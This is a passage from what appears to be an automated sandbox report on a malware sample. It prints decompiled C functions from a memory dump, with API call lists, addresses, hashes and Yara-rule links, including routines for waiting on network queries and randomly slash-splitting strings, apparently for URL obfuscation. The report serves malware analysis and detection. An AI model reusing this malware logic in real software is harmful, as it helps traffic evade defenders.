                                                          • Opcode ID: 434e9942c95311ff425c2a320c61521ecf02902b0b50532450f5667a00f7e1a5
                                                          • Instruction ID: 7aa6d52d125c0714bae38f298f0908d7aaa1f48987b3bf0fd4b1e6edd935c32a
                                                          • Opcode Fuzzy Hash: 434e9942c95311ff425c2a320c61521ecf02902b0b50532450f5667a00f7e1a5
                                                          • Instruction Fuzzy Hash: 3B41A071A00259BBEF10DFA9CC41BDE7775EF44314F10852AF90AAB681DB70B9568B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0447A81C, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000008,74B04D40), ref: 0447A82E
                                                            • Part of subcall function 0447A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04475595), ref: 0447A72B
                                                          • ResetEvent.KERNEL32(?), ref: 0447A8A2
                                                          • GetLastError.KERNEL32 ref: 0447A8C5
                                                          • GetLastError.KERNEL32 ref: 0447A970
                                                            • Part of subcall function 0447A734: HeapFree.KERNEL32(00000000,00000000,04475637,00000000,?,?,00000000), ref: 0447A740
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                          • String ID:
                                                          • API String ID: 943265810-0
                                                          • Opcode ID: dd001b888183037a5f745c52db0b8aab1f72be9f413c781477844c2a4d146bcb
                                                          • Instruction ID: 75a966e8fb76304dd4fb6092acb55a34e40cdab1618c1107eb0c57e9f644309e
                                                          • Opcode Fuzzy Hash: dd001b888183037a5f745c52db0b8aab1f72be9f413c781477844c2a4d146bcb
                                                          • Instruction Fuzzy Hash: 21418FB1500604BFEB319FA1DC88E9F7BBDEF85740B10492AF542E1191E735A956CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 044715FF, Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 42%
                                                          			E044715FF(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				void* _t30;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_push( &_v8);
					_push(4);
					_push( &_v20);
					_push( *((intOrPtr*)(_t69 + 0x18)));
					if( *0x447d134() != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x447d164(0, 1,  &_v12);
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E0447A71F(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_push( &_v8);
										_push(0x1000);
										_push(_v16);
										_push( *((intOrPtr*)(_t69 + 0x18)));
										if( *0x447d134() != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E04475646( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E0447A734(_v16);
										if(_t64 == 0) {
											_t64 = E044770CC(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E04475646( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E04479242(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}
















                                                          0x044715ff
                                                          0x04471600
                                                          0x04471606
                                                          0x04471611
                                                          0x04471611
                                                          0x04471613
                                                          0x044718e7
                                                          0x044718ec
                                                          0x044718ee
                                                          0x044718f3
                                                          0x044718f4
                                                          0x044718f9
                                                          0x044718fa
                                                          0x04471905
                                                          0x04471936
                                                          0x0447193b
                                                          0x044719fe
                                                          0x04471941
                                                          0x04471948
                                                          0x04471950
                                                          0x044719fb
                                                          0x04471956
                                                          0x0447195b
                                                          0x04471960
                                                          0x04471965
                                                          0x044719ed
                                                          0x0447196b
                                                          0x0447196b
                                                          0x0447196d
                                                          0x04471973
                                                          0x04471974
                                                          0x04471974
                                                          0x04471977
                                                          0x0447197a
                                                          0x04471980
                                                          0x04471985
                                                          0x04471986
                                                          0x0447198b
                                                          0x0447198e
                                                          0x04471999
                                                          0x00000000
                                                          0x00000000
                                                          0x044719a1
                                                          0x044719a9
                                                          0x044719b5
                                                          0x044719b9
                                                          0x044719bb
                                                          0x044719c0
                                                          0x00000000
                                                          0x00000000
                                                          0x044719c0
                                                          0x044719b9
                                                          0x044719d2
                                                          0x044719d5
                                                          0x044719dc
                                                          0x044719e7
                                                          0x044719e7
                                                          0x00000000
                                                          0x044719c2
                                                          0x044719c2
                                                          0x044719c7
                                                          0x044719c9
                                                          0x044719ca
                                                          0x044719cd
                                                          0x00000000
                                                          0x044719cd
                                                          0x00000000
                                                          0x044719c7
                                                          0x04471974
                                                          0x044719ee
                                                          0x044719ee
                                                          0x044719f4
                                                          0x044719f4
                                                          0x04471950
                                                          0x04471907
                                                          0x0447190d
                                                          0x04471915
                                                          0x0447192e
                                                          0x04471930
                                                          0x00000000
                                                          0x00000000
                                                          0x04471917
                                                          0x04471921
                                                          0x04471925
                                                          0x0447192b
                                                          0x00000000
                                                          0x0447192b
                                                          0x04471925
                                                          0x04471915
                                                          0x04471a07
                                                          0x04471608
                                                          0x04471608
                                                          0x0447160f
                                                          0x0447161a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0447160f

                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74B481D0), ref: 044718EE
                                                          • GetLastError.KERNEL32(?,?,?,00000000,74B481D0), ref: 04471907
                                                          • ResetEvent.KERNEL32(?), ref: 04471980
                                                          • GetLastError.KERNEL32 ref: 0447199B
                                                            • Part of subcall function 04479242: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 04479259
                                                            • Part of subcall function 04479242: SetEvent.KERNEL32(?), ref: 04479269
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$ObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 1123145548-0
                                                          • Opcode ID: 419cdffdcd713ff7da7ad941bdc038266df57fc870bbf37f29aa75f29bce9d35
                                                          • Instruction ID: 802596b00444601327592940d2bf1150ab6422fc04f6ae4cfa482477734524c4
                                                          • Opcode Fuzzy Hash: 419cdffdcd713ff7da7ad941bdc038266df57fc870bbf37f29aa75f29bce9d35
                                                          • Instruction Fuzzy Hash: 8441B172600604ABDF219FA5CC84AEFB7B9EF84265F10052AE551E7351EA30F903DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04473AB0, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(80000002), ref: 04473B0D
                                                          • SysAllocString.OLEAUT32(044785ED), ref: 04473B51
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04473B65
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04473B73
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: 9cd3148ce0f5a996c725988ddc7f403bd89bbd967d89f4290ea4917f031e78ca
                                                          • Instruction ID: 500561a3b0b7730e53cdd106dd40a25e54dfbd802d9ee3db1ed64d980d0c3d62
                                                          • Opcode Fuzzy Hash: 9cd3148ce0f5a996c725988ddc7f403bd89bbd967d89f4290ea4917f031e78ca
                                                          • Instruction Fuzzy Hash: 96310E71900249EFDF14DFA8D8C08EEBBB9FF48340B10842EF90697251D734AA42DBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 044711EE, Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 87%
                                                          			E044711EE(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x447d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x447d2a8; // 0xb9a5a8
				_t3 = _t8 + 0x447e87e; // 0x61636f4c
				_t25 = 0;
				_t30 = E044738A8(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x447d2ac, 1, 0, _t30);
					E0447A734(_t30);
				}
				_t12 =  *0x447d25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E0447A65C() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E04478EA1(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x447d10c( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E0447A273(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                                                          0x044711ef
                                                          0x044711f6
                                                          0x04471200
                                                          0x04471204
                                                          0x0447120a
                                                          0x04471219
                                                          0x04471220
                                                          0x04471224
                                                          0x04471236
                                                          0x04471238
                                                          0x04471238
                                                          0x0447123d
                                                          0x04471244
                                                          0x0447129b
                                                          0x0447129b
                                                          0x044712a1
                                                          0x044712a3
                                                          0x044712a3
                                                          0x044712ad
                                                          0x044712b1
                                                          0x044712c3
                                                          0x044712c3
                                                          0x044712c7
                                                          0x044712cd
                                                          0x044712cd
                                                          0x00000000
                                                          0x0447125d
                                                          0x04471262
                                                          0x0447126a
                                                          0x0447126e
                                                          0x04471272
                                                          0x04471272
                                                          0x0447127f
                                                          0x04471283
                                                          0x04471287
                                                          0x044712dc
                                                          0x044712e2
                                                          0x044712e2
                                                          0x04471295
                                                          0x04471299
                                                          0x044712d0
                                                          0x044712d2
                                                          0x044712d5
                                                          0x044712d5
                                                          0x00000000
                                                          0x044712d2
                                                          0x04471299
                                                          0x00000000
                                                          0x04471283

                                                          APIs
                                                            • Part of subcall function 044738A8: lstrlen.KERNEL32(00000005,00000000,63699BC3,00000027,00000000,05019A98,00000000,?,?,63699BC3,00000005,0447D00C,?,?,04475D30), ref: 044738DE
                                                            • Part of subcall function 044738A8: lstrcpy.KERNEL32(00000000,00000000), ref: 04473902
                                                            • Part of subcall function 044738A8: lstrcat.KERNEL32(00000000,00000000), ref: 0447390A
                                                          • CreateEventA.KERNEL32(0447D2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04473760,?,00000001,?), ref: 0447122F
                                                            • Part of subcall function 0447A734: HeapFree.KERNEL32(00000000,00000000,04475637,00000000,?,?,00000000), ref: 0447A740
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,04473760,00000000,00000000,?,00000000,?,04473760,?,00000001,?,?,?,?,044752AA), ref: 0447128F
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,04473760,?,00000001,?), ref: 044712BD
                                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04473760,?,00000001,?,?,?,?,044752AA), ref: 044712D5
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 73268831-0
                                                          • Opcode ID: b71b32cdb8e2ef9bd4cdac2c3f538372dfc1a4012e005e65a6370f7f56e84bb3
                                                          • Instruction ID: f521b11768e7b18a1c05cb809e820cb59dd483b256eb899e47723aafcbcd60be
                                                          • Opcode Fuzzy Hash: b71b32cdb8e2ef9bd4cdac2c3f538372dfc1a4012e005e65a6370f7f56e84bb3
                                                          • Instruction Fuzzy Hash: 2321C332A002505BEF315AA99C84AEBF3A9FF85711F15062BFF45F7341DB64E9038694
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04479242, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 38%
                                                          			E04479242(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x447d13c; // 0x447abf1
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E0447A71F(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E0447A734(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E04475646( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}















                                                          0x04479242
                                                          0x04479242
                                                          0x0447924c
                                                          0x04479252
                                                          0x04479255
                                                          0x04479259
                                                          0x0447925f
                                                          0x04479264
                                                          0x0447927d
                                                          0x04479280
                                                          0x04479284
                                                          0x04479288
                                                          0x04479289
                                                          0x0447928e
                                                          0x04479291
                                                          0x04479298
                                                          0x0447929f
                                                          0x044792f2
                                                          0x044792f8
                                                          0x044792fe
                                                          0x04479339
                                                          0x0447933f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x044792fe
                                                          0x044792a5
                                                          0x00000000
                                                          0x044792ac
                                                          0x044792ba
                                                          0x044792bd
                                                          0x044792c0
                                                          0x044792cc
                                                          0x044792d0
                                                          0x04479332
                                                          0x044792d2
                                                          0x044792d5
                                                          0x044792d9
                                                          0x044792da
                                                          0x044792db
                                                          0x044792dd
                                                          0x044792e4
                                                          0x04479322
                                                          0x0447932d
                                                          0x044792e6
                                                          0x044792e9
                                                          0x044792ed
                                                          0x044792ed
                                                          0x044792e4
                                                          0x00000000
                                                          0x044792d0
                                                          0x044792a5
                                                          0x04479269
                                                          0x0447926f
                                                          0x04479272
                                                          0x04479277
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04479307
                                                          0x0447930f
                                                          0x04479314
                                                          0x04479317
                                                          0x00000000

                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 04479259
                                                          • SetEvent.KERNEL32(?), ref: 04479269
                                                          • GetLastError.KERNEL32 ref: 044792F2
                                                            • Part of subcall function 04475646: WaitForMultipleObjects.KERNEL32(00000002,0447A8E3,00000000,0447A8E3,?,?,?,0447A8E3,0000EA60), ref: 04475661
                                                            • Part of subcall function 0447A734: HeapFree.KERNEL32(00000000,00000000,04475637,00000000,?,?,00000000), ref: 0447A740
                                                          • GetLastError.KERNEL32(00000000), ref: 04479327
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                          • String ID:
                                                          • API String ID: 602384898-0
                                                          • Opcode ID: 8bfd4222b359fa51c20ced76cbcd3ecd9f414b4f91b36e49f1adca340690fe31
                                                          • Instruction ID: 27f1cf2ce732004d7816e107d8d32051d3f24a40c99e6b9cffdb2fa9161d0e52
                                                          • Opcode Fuzzy Hash: 8bfd4222b359fa51c20ced76cbcd3ecd9f414b4f91b36e49f1adca340690fe31
                                                          • Instruction Fuzzy Hash: D631DCB5900349EFEF21DFE5D8C49EEB7B8EB08344F10496AE642E2251D734AA469B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 044736B1, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 40%
                                                          			E044736B1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E04473BB9(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E04474F79(_t23);
						}
					}
					return _t38;
				}
				if(E0447A2F9(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x447d2ac, 1, 0,  *0x447d344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E0447A446(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E0447853F(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E04474F14(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E044711EE( &_v32, _t39);
					goto L13;
				}
			}












                                                          0x044736b1
                                                          0x044736be
                                                          0x044736c4
                                                          0x044736c5
                                                          0x044736c6
                                                          0x044736c7
                                                          0x044736c8
                                                          0x044736cc
                                                          0x044736d8
                                                          0x044736dc
                                                          0x04473764
                                                          0x04473764
                                                          0x04473767
                                                          0x04473769
                                                          0x04473771
                                                          0x04473771
                                                          0x04473777
                                                          0x0447377a
                                                          0x0447377a
                                                          0x04473777
                                                          0x04473785
                                                          0x04473785
                                                          0x044736ef
                                                          0x044736f1
                                                          0x044736f1
                                                          0x04473708
                                                          0x0447370c
                                                          0x0447370f
                                                          0x0447371a
                                                          0x04473721
                                                          0x04473721
                                                          0x0447372a
                                                          0x0447372e
                                                          0x0447373c
                                                          0x04473730
                                                          0x04473730
                                                          0x04473731
                                                          0x04473732
                                                          0x04473733
                                                          0x04473734
                                                          0x04473735
                                                          0x04473735
                                                          0x04473741
                                                          0x04473744
                                                          0x04473748
                                                          0x0447374a
                                                          0x0447374a
                                                          0x04473751
                                                          0x00000000
                                                          0x04473753
                                                          0x04473753
                                                          0x04473760
                                                          0x00000000
                                                          0x04473760

                                                          APIs
                                                          • CreateEventA.KERNEL32(0447D2AC,00000001,00000000,00000040,00000001,?,74B5F710,00000000,74B5F730,?,?,?,044752AA,?,00000001,?), ref: 04473702
                                                          • SetEvent.KERNEL32(00000000,?,?,?,044752AA,?,00000001,?,00000002,?,?,04475D5E,?), ref: 0447370F
                                                          • Sleep.KERNEL32(00000BB8,?,?,?,044752AA,?,00000001,?,00000002,?,?,04475D5E,?), ref: 0447371A
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,044752AA,?,00000001,?,00000002,?,?,04475D5E,?), ref: 04473721
                                                            • Part of subcall function 0447A446: WaitForSingleObject.KERNEL32(00000000,?,?,?,04473741,?,04473741,?,?,?,?,?,04473741,?), ref: 0447A520
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                          • String ID:
                                                          • API String ID: 2559942907-0
                                                          • Opcode ID: 3fd558a3815328779635e48f723ec879ab511abcb170e41f9865ef973ec36dd2
                                                          • Instruction ID: 38f7b93a3f95c3772093a9a46ca284d57aab19dc869b8d0886d30972441d73f7
                                                          • Opcode Fuzzy Hash: 3fd558a3815328779635e48f723ec879ab511abcb170e41f9865ef973ec36dd2
                                                          • Instruction Fuzzy Hash: 832153B2900259ABDF20BFE589C58EFB769EB44354B01842BEE11A7201D634B947DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 044717E5, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E044717E5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x447d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x447d250; // 0xfd3fe438
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x447d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                          0x044717ed
                                                          0x044717f0
                                                          0x044717f6
                                                          0x0447180e
                                                          0x04471810
                                                          0x04471815
                                                          0x04471817
                                                          0x0447181a
                                                          0x0447181c
                                                          0x0447181f
                                                          0x04471821
                                                          0x04471821
                                                          0x04471823
                                                          0x0447182e
                                                          0x04471833
                                                          0x04471844
                                                          0x0447184c
                                                          0x04471851
                                                          0x04471854
                                                          0x04471857
                                                          0x04471859
                                                          0x0447185c
                                                          0x0447185f
                                                          0x0447185f
                                                          0x04471862
                                                          0x0447186d
                                                          0x04471872
                                                          0x0447187c

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04471C49,00000000,?,?,044720C2,?,050195B0), ref: 044717F0
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04471808
                                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04471C49,00000000,?,?,044720C2,?,050195B0), ref: 0447184C
                                                          • memcpy.NTDLL(00000001,?,00000001), ref: 0447186D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 1819133394-0
                                                          • Opcode ID: a11363d7445836b4306a1b213b4ca0619b39fc166c74dc87dc4ec5a30371aad9
                                                          • Instruction ID: 7b27e93f8151ec6bc7c1b921b733a2e4740c4ce438f69dc2c38a019294d1a249
                                                          • Opcode Fuzzy Hash: a11363d7445836b4306a1b213b4ca0619b39fc166c74dc87dc4ec5a30371aad9
                                                          • Instruction Fuzzy Hash: 7F11CA72A00154AFE7108BA9DC84E9EBBBEDF84660B05017AF6059B250E7749D068790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0447486F, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E0447486F(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E0447A71F(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x447c284);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
